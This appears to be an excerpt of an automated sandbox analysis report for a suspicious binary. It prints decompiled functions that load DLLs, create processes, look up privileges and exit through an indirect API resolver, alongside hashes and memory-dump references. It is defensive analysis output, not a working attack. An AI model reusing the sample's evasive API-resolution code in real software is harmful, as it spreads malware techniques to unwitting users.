Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040ACF0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* __ebp;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040ad0c
0x0040ad0f
0x0040ad14
0x0040ad19
0x0040ad23
0x0040ad28
0x0040ad2b
0x0040ad2d
0x0040ad35
0x0040ad3a
0x0040ad3a
0x0040ad41
0x0040ad49
0x0040ad4c
0x0040ad4e
0x0040ad62
0x00000000
0x0040ad64
0x0040ad6a
0x0040ad1e
0x0040ad1e
0x0040ad1e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE3 Relevance: 1.5, APIs: 1, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040ACE3(void* __eax, char* __ecx, void* __edx, long _a4, long _a8) {
				long _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* __ebp;
				intOrPtr* _t18;
				intOrPtr* _t25;

				_t18 = _t25;
				 *__ecx =  *__ecx + 1;
				asm("jecxz 0x6f");
				if( *__ecx >= 0) {
					while(1) {
						 *_t18 =  *_t18 + _t18;
						asm("adc [eax+0x49], al");
						if( *_t18 == 0) {
							break;
						}
					}
					return _t18;
				} else {
					_t3 = __eax;
					__eax = __ecx;
					__ecx = _t3;
					__eflags = __edx;
					asm("scasb");
					__eax = 0xec8b55db;
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x214;
					__ecx = _a8;
					__edx =  &_v12;
					__eax =  &_v536;
					_v8 =  &_v536;
					__eax = E0041CC50( &_v12, 0x104, _a8);
					__eflags = __eax;
					if(__eflags != 0) {
						__eax = _v8;
						__eax = E0041D070(__eflags, _v8);
						__eflags = __eax;
						if(__eax != 0) {
							__ecx =  &_v12;
							__eax = E0041D2F0(__ebx,  &_v12, 0);
						}
						__edx = _v8;
						__eax = E0041B4A0(_v8);
						_v16 = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							__edx = _a4;
							 &_v16 =  *((intOrPtr*)(_a4 + 8));
							__ecx =  &_v12;
							__eax = LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
							__eax = _v16;
						}
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					}
				}
			}

0x0040ace3
0x0040ace4
0x0040ace6
0x0040ace8
0x0040acd8
0x0040acd8
0x0040acda
0x0040acdd
0x00000000
0x00000000
0x0040acd6
0x0040ace2
0x0040acea
0x0040acea
0x0040acea
0x0040acea
0x0040aceb
0x0040acec
0x0040acee
0x0040acf0
0x0040acf1
0x0040acf3
0x0040acf9
0x0040acfd
0x0040ad00
0x0040ad0c
0x0040ad0f
0x0040ad17
0x0040ad19
0x0040ad1f
0x0040ad23
0x0040ad2b
0x0040ad2d
0x0040ad2f
0x0040ad35
0x0040ad3a
0x0040ad3d
0x0040ad41
0x0040ad49
0x0040ad4c
0x0040ad4e
0x0040ad50
0x0040ad57
0x0040ad5a
0x0040ad62
0x0040ad64
0x0040ad64
0x0040ad67
0x0040ad69
0x0040ad6a
0x0040ad1b
0x0040ad1b
0x0040ad1d
0x0040ad1e
0x0040ad1e
0x0040ad19

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 14888bb1db3f49f456aafebff8d6b81a65ef47f8327817e40e20fd3b6671f829
Instruction ID: 9d0cb72b20f1a40d868f2c9d00181236f0053b440c17681bf246735d1b0a5ee8
Opcode Fuzzy Hash: 14888bb1db3f49f456aafebff8d6b81a65ef47f8327817e40e20fd3b6671f829
Instruction Fuzzy Hash: 3DF04C71B402096FCB10DAD4EC41FE87776DB5432AF0041EBEA0CEB5D1E17199548791

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6E0 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0041A6E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, void* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				intOrPtr _t26;
				intOrPtr _t31;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0xfffde485
				_t3 = _t16 + 0xc80; // 0x4099a9
				_t34 = _t3;
				E0041AF60(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t26 = _a20;
				_t31 = _a16;
				asm("adc al, 0x50");
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _t31, _t26, _t35, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}

0x0041a6e3
0x0041a6e6
0x0041a6f2
0x0041a6f2
0x0041a6fa
0x0041a720
0x0041a724
0x0041a726
0x0041a734
0x0041a738

APIs

CreateProcessInternalW.KERNELBASE(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A739 Relevance: 1.5, APIs: 1, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 2a4365651d6cf8acc679dacb8bb80ca7c6b8f2171619be955ffab8f28568435b
Instruction ID: 3548c7aa6bebe18d285bd084cf0dd39bbcffa74401bbc48417aa4376b8a9be3c
Opcode Fuzzy Hash: 2a4365651d6cf8acc679dacb8bb80ca7c6b8f2171619be955ffab8f28568435b
Instruction Fuzzy Hash: 80F030B2241108AFDB14DF99EC40EEB736DEF88364F14855AF91C97645C530E9158BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A662(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t17;

				asm("sbb eax, 0xec8b5554");
				_t8 = _a4;
				_t3 = _t8 + 0xc74; // 0xc74
				E0041AF60(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}

0x0041a66e
0x0041a673
0x0041a67f
0x0041a687
0x0041a69d
0x0041a6a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4dd9549baba70e7779ad0162a2ad9e05e0908a7ebfeea43d096bdbd027a84c92
Instruction ID: b79e653112b4ac12ad7ccce2693e843d6f61773fc372cbdfc1695a69098e802e
Opcode Fuzzy Hash: 4dd9549baba70e7779ad0162a2ad9e05e0908a7ebfeea43d096bdbd027a84c92
Instruction Fuzzy Hash: 7EE092B12502046BDB14DF98CC45ED73769EF84754F108549F90C9B251C130E915CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a67f
0x0041a687
0x0041a69d
0x0041a6a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a7ea
0x0041a800
0x0041a804

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a6b3
0x0041a6ca
0x0041a6d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6AD Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041A6AD(intOrPtr _a4, int _a8) {
				void* _t10;

				asm("invalid");
				asm("int 0x55");
				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a6ad
0x0041a6af
0x0041a6b3
0x0041a6ca
0x0041a6d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 37f0e7a2d2cfb2d0ec8587c311650fa1c9b908c137ae338bec9a0ab3d4f7b6ea
Instruction ID: 580d5eec7f9ed88d975a6674760969ad8f9bb65e1d10f3ee4c346365eac3cbf1
Opcode Fuzzy Hash: 37f0e7a2d2cfb2d0ec8587c311650fa1c9b908c137ae338bec9a0ab3d4f7b6ea
Instruction Fuzzy Hash: D5E01771604204BBD724EF68CCC5FD73BA8EF49750F158468BA5D6B242CA30EA01CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0168967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01689694

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8cfcc8f44384a562aaa7c872a10245f6fa04f86c3b725559e8c9dc1b64d8af15
Instruction ID: d1fba997c1b32e7c9464c3d2e5674dd6811df9fce7de2df56acc3a6358f571c0
Opcode Fuzzy Hash: 8cfcc8f44384a562aaa7c872a10245f6fa04f86c3b725559e8c9dc1b64d8af15
Instruction Fuzzy Hash: ADB09B719414D5C6EB15E7A44F08737790477D1745F16C161D1020651B4778C4D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01678E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E01678E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x173d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1738464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1735780 & 0x00000003) != 0) {
							E016C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1735780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0168B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1737984; // 0x11e2db8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1738464; // 0x74cc0110
					 *0x173b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01679B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1735780 & 0x00000005) != 0) {
						_push(_t49);
						E016C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01678e0f
0x01678e16
0x01678e19
0x01678e1b
0x01678e21
0x01678e7f
0x01678e85
0x016b9354
0x016b936c
0x016b9371
0x016b937b
0x016b9381
0x016b9381
0x016b937b
0x01678e9d
0x01678e9d
0x01678e29
0x01678e2c
0x01678e38
0x01678e3e
0x01678e43
0x01678eb5
0x01678eb9
0x016b92aa
0x016b92af
0x016b92e8
0x016b92e8
0x016b92af
0x01678eb9
0x01678e45
0x01678e53
0x01678e5b
0x01678e5f
0x01678e78
0x01678e78
0x01678e7d
0x01678ec3
0x01678ecd
0x01678ed2
0x01678ed2
0x01678ec5
0x01678ec5
0x00000000
0x01678e7d
0x01678e67
0x01678ea4
0x016b931a
0x00000000
0x00000000
0x016b9320
0x01678ea4
0x01678e70
0x016b9325
0x016b9340
0x016b9345
0x016b9345
0x01678e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01678E53

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 016B933B, 016B9367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 016B932A
Querying the active activation context failed with status 0x%08lx, xrefs: 016B9357
LdrpFindDllActivationContext, xrefs: 016B9331, 016B935D

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 5d0c771a612ef9fc1c9c44ba117a1e312d778eb074ae5e57af41340e8d025939
Instruction ID: 7396f755b7bca22776aa69905174a9e7819060b7c70d58d75f7b467a95c19d9e
Opcode Fuzzy Hash: 5d0c771a612ef9fc1c9c44ba117a1e312d778eb074ae5e57af41340e8d025939
Instruction Fuzzy Hash: D3413B71A003119FEB36AB1CCC8DA7676BDAB40718F05896DEA0997252E770AD808781

Uniqueness

Uniqueness Score: -1.00%

Function 01686DE6 Relevance: .1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01686DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E01686EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E01676A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

0x01686de6
0x01686dee
0x01686df1
0x01686df4
0x01686dfd
0x016c05d3
0x016c05d3
0x016c05e4
0x016c05f9
0x016c05f9
0x016c05fe
0x01686e96
0x01686e9c
0x01686e9c
0x01686e03
0x01686e09
0x01686e0c
0x01686e12
0x01686e15
0x01686e1b
0x016c05a1
0x01686eb1
0x01686eb1
0x01686eb1
0x01686e21
0x01686e2a
0x01686e9f
0x01686eab
0x00000000
0x00000000
0x00000000
0x01686eab
0x01686e2c
0x01686e34
0x00000000
0x01686e3d
0x01686e3d
0x01686e42
0x01686e4d
0x016c05ac
0x016c05b2
0x016c05b2
0x00000000
0x016c05ac
0x01686e56
0x01686e59
0x01686e5d
0x01686e5f
0x01686e64
0x01686e94
0x01686e94
0x00000000
0x01686e94
0x01686e6a
0x01686e6d
0x016c05ba
0x016c05bd
0x016c05ca
0x016c05cc
0x01686e91
0x01686e91
0x00000000
0x01686e91
0x016c05c0
0x00000000
0x016c05c0
0x01686e7e
0x01686e7e
0x01686e80
0x01686e86
0x00000000
0x00000000
0x01686eba
0x01686eba
0x01686e88
0x01686e8b
0x01686e8f
0x00000000
0x01686e8f

Memory Dump Source

Source File: 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Associated: 00000002.00000002.369988143.000000000173B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_bstkiooen.jbxd

Similarity

